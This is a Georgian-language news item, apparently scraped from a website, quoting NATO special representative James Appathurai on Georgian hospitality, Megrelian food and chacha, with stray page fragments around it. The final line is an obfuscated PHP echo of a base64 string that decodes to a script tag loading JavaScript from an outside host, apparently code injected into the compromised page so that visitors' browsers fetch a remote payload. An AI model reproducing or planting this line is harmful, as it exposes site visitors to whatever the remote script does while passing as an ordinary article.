celsiusi
ავერსი შნაიდერი
სამხრეთ კავკასიასა და ცენტრალურ აზიაში ნატოს გენერალური მდივნის სპეციალური წარმომადგენელი, ჯეიმს აპატურაი ამბობს , რომ საქართველოსთან და ქართველებთან ძალიან მჭიდრო და პირადი ურთიერთობები აქვს.
 
აპატურაიმ ტელეკომპანია "იმედის" ეთერში ქართულ სამზარეულოზე ისაუბრა და თქვა, რომ მეგრელებზე ცხარე კერძებს ამზადებს. 
 
"ქართველები მთელ გულს გიხსნიან, გეპატიჟებიან სახლში და როდესაც ქართველთან ერთად ხარ, ვერაფრის საფასურს გადაიხდი. არ არსებობს, რამეზე დაპატიჟო და ამით პატივისცემა გამოხატო. სულ ვამბობ, რომ საქართველოს ეკონომიკა გაცილებით ძლიერი იქნებოდა, სტუმარს რომ თუნდაც ელემენტარულის გადახდის საშუალებას აძლევდეთ, მაგრამ ქართველთან ნებისმიერი მცდელობა წარუმატებელია. ძალიან მჭიდრო პირადი ურთიერთობები მაქვს საქართველოსთან და ეს ძალიან ძვირფასია ჩემთვის.
 
მეორე, რასაც ძალიან ვაფასებ ქართველების მიზანდასახულობაა, რომ სურთ ამ საზოგადოების წევრები იყვნენ და არასდროს ნებდებიან. ეს ძალიან შთამბეჭდავია. ვახსენოთ ქართველები და არ ვახსენოთ სამზარეულო და, განსაკუთრებით ჭაჭა, დანაშაული იქნება. არა მარტო მიყვარს ხაჭაპური და ჭაჭა, არამედ მე ვაკეთებ ხაჭაპურს. დავიწყე სახლში მეგრული კერძების მომზადება, ძალიან მიყვარს მწარე. მეგრელებზე მწარეს ვაკეთებ. სახლში ქართულ კერძები გვაქვს, მივირთმევ ქართულ ღვინოს, ჭაჭას და ნელ-ნელა ცოტა ქართველიც ვხდები. "- განაცხადა აპატურაიმ.
 
 
2367
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");